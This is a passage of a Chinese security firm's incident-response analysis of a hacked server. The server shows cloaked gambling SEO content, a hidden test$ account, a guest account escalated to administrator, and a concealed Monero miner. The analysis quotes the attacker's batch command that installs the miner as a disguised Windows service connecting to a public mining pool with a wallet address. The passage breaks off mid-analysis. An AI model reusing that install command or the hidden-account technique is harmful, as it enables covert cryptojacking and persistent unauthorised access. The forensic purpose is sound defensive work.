本文是前段时间处理某用户被黑的分析总结，用户被黑的表现是使用爬虫访问用户网站的首页时会出现博彩关键字，而使用正常浏览器访问时无相关的博彩关键词。这是典型的黑帽SEO的表现，针对这种技术，前期文章已有相关分析，感兴趣的同学可以看一看。
此次分析，发现用户的服务器被多波不同利益的黑客入侵，里面有一些比较有意思的内容，所以特意分析总结了一下。
一、概述
1、分析结果
经过分析，目前得到以下结论：
1）服务器上存在博彩信息与挖矿程序，说明被多波不同利益团队的黑客入侵；
2）此服务器于2018年9月21日被黑客入侵后加上相应的博彩内容，相应的IP为175.41.27.93；
3）此服务器在2016年2月份甚至更早就已经被黑客植入网马了；
4）服务器在2017年12月19日被植入挖矿程序；
5）系统被增加了隐藏账号test$，并且在2018年9月21日14:38发现账号guest有IP为212.66.52.88，地理位置为乌克兰登录的情况。
二、分析过程
2.1 入侵现象
2018年9月份，通过我司监测平台监测到某网站被植入博彩内容，具体如下：


网站被植入博彩信息
网站被植入博彩基本上说明网站被黑客入侵，我司“捕影”应急响应小组立即协助用户进行入侵分析。
2.2 系统分析
系统分析主要用于分析其系统账号、进程、开放端口、连接、启动项、文件完整性、关键配置文件等，通过系统相关项的分析判断其系统层面是否正常。对其系统层面分析，发现以下层面存在问题：
系统账号
对系统账号的分析，目前发现系统存在以下账号：
Administraotr、MYSQL_ZKEYS、test$ 、zhimei、renjian、APP_IWAM_61264026、APP_IWAM_6127201、guest
其中test$明显为隐藏账号，一般情况下系统管理员不会增加隐藏账号，该账号肯定为黑客增加。另外几个账号，如zhimei、renjian等为可疑账号，需要管理人员进行确认。


系统账号情况

管理员信息
管理员组中存在administrator和guest，一般情况下guest为来宾账号，不会增加到管理员组中，怀疑该账号为黑客增加到管理员组中。
系统账号存在两个问题：
1）服务器被增加test$隐藏账号
2）Guest账号被加入到管理员组中
日志分析
通过相关安全产品的日志，可以看到guest账号于2018年9月21日14:38被IP为212.66.52.88的乌克兰IP登录，该账号密码肯定已泄露，建议禁用该账号。

进程与服务分析
对其服务器分析，发现其服务器的CPU利用率非常高，利用率为100%。发现主要被SQLServer.exe占用。

CPU利用率为100%

SQLServer.exe占用CPU最高
找到该程序所在的目录，发现该程序放在C:\ProgramData\MySQL目录下，并且被目录被隐藏。里面有四个文件，两个bat文件，两个exe文件。

【Startservice.bat功能分析】
对startservice.bat进行分析，其内容如下：

其功能如下：
1）set SERVICE_NAME=SystemHost，指定其服务名为SystemHost：

2）Tomcat9 install"%SERVICE_NAME%" SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt
7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0
使用Tomcat9 安装相应的挖矿程序，挖矿参数分析：
矿池地址
pool.minexmr.com
矿池端口
7777
矿工账号
49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F
挖矿程序被植入时间